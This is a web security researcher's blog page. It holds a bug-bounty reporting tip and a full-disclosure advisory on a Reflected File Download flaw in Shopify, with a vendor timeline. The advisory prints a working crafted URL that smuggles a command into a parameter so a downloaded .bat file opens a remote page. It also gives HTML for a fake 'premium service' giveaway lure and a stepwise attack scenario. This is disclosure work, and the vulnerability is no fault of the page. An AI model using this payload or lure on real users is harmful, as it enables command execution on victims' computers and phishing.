David Sopas – Web Security Researcher

spf

08/10/15 Bug Bounty , Tips and Tricks # , , , ,

A tip for bug hunters – Sell your service

A tip for bug hunters – Sell your service

As a bug hunter at Cobalt, HackerOne and BugCrowd I always try do my best to give programs the best information needed to understand the security report.
Sometimes I notice that some public disclosures on HackerOne have just two or three paragraphs like:

You guys don’t have SPF header on your mail server.
Check it online here: …

If I was the program manager I would categorize this like “WTF” bug or something. Not for the vulnerability itself but because the lack of information and effort by the bug hunter. You need to sell your service. You need to show the program that you care and you know what you are talking about. Treat the program like your client.
Sometimes this make the difference between earning kudos and earning money.

Elaborate the security vulnerability as much as possible and describe possible attack scenarios. Screenshots and videos are always a bonus.
Also show the “client” clear solutions for their problem.

Hey this is just a small tip… Hope it makes difference on your future reports!

one response
29/09/15 Advisories # , , ,

Shopify open to a RFD attack

Shopify open to a RFD attack

Before Shopify having a bounty program on HackerOne I already sent [on 19 march] a security report about a Reflected Filename Download I found on their website.
It doesn’t need any authentication like access_token, api_key or even an account on Shopify.

The problem is located under app.shopify.com service.

On Internet Explorer 9 and 8 browsers if you run the following link:

https://app.shopify.com/services/signup/track.bat?callback=foobar&signup_page=http%3A%2F%2Fwww.shopify.com%2F%22||start%20chrome%20davidsopas.com/poc/malware.htm||&_=

It will show download dialog with a file named track.bat that after execution it will run Google Chrome with a malicious webpage (in this case it’s only text).
Of course a malicious user could run any operating system command he wishes.

On other browsers like Chrome, Opera, Firefox, Android Browser and Chrome for Android latest versions you need to visit a page which will force the download using HTML5 <A DOWNLOAD> attribute:

<div align="center"> 
<a href="https://app.shopify.com/services/signup/track.bat?callback=foobar&signup_page=http%3A%2F%2Fwww.shopify.com%2F%22||start%20chrome%20davidsopas.com/poc/malware.htm||&_=" download="track.bat">
<img src="http://harleyf.com/wp-content/uploads/2010/03/94_shopify.png" border="0" />
</a> <
h1>Shopify is giving away premium service!</h1> 
<p><i>(Firefox users: Use "Save link as" to download the file)</i></p> 
</div>

When the victim visits a specially crafted page with the code above and click the image it will show the download dialog and after downloading it will show that the file is coming from Shopify servers.

shopify_chrome_rfd

shopify_opera_rfd

So a possible attack scenario will be:

  1. Malicious user sends link to victim like it would with a CSRF or a XSS (phishing campaigns, social networks, instant messengers, posts, etc)
  2. Victim clicks the link and trusting where it came from (Shopify) he downloads it
  3. Victim runs the file and his computer it’s hijacked

To the victim, the entire process looks like a file is offered for download from Shopify original site and it would not raise any suspicious. A malicious user could gain complete control over a victims computer system and launch malicious files that appear to originate from a trusted party.

In my opinion this was the last time I’ll send anything to Shopify. We have different views on patching security reports.
An example: Some of the bounties that they already paid on HackerOne are Self-XSS and Missing SPF. Both issues were awarded with the minimum amount – $500. I don’t know where or why these issues are more dangerous than my security report but it’s up to them.
I was patient and gave them enough time to fix this issue – even sending them possible solutions. More than 6 months on a paid online store service and still unfixed seems to much.

So beware of this issue because according to Shopify they don’t foresee that this issue will be fixed any time soon.

Timeline:
19-03-2015 Reported this security issue to Shopify
27-03-2015 No reply so I asked for a update
06-04-2015 First contact with Shopify which they reply that it’s being processed
15-04-2015 Shopify told me that this security issue is interesting and ask for more information
15-04-2015 I sent more information and new proof-of-concept
04-05-2015 I asked for a update (no reply)
15-06-2015 I asked for another update (no reply)
16-09-2015 I asked for another update
22-09-2015 Since April without any email from Shopify they replied that they were working on fixing more urgent issues and consider mine a low impact and low priority
23-09-2015 I told them that it’s not a social engineering issue but they still don’t understand it
23-09-2015 Shopify told me that their prioritization is not up for discussion and not patching any time soon.
25-09-2015 Full disclosure

3 responses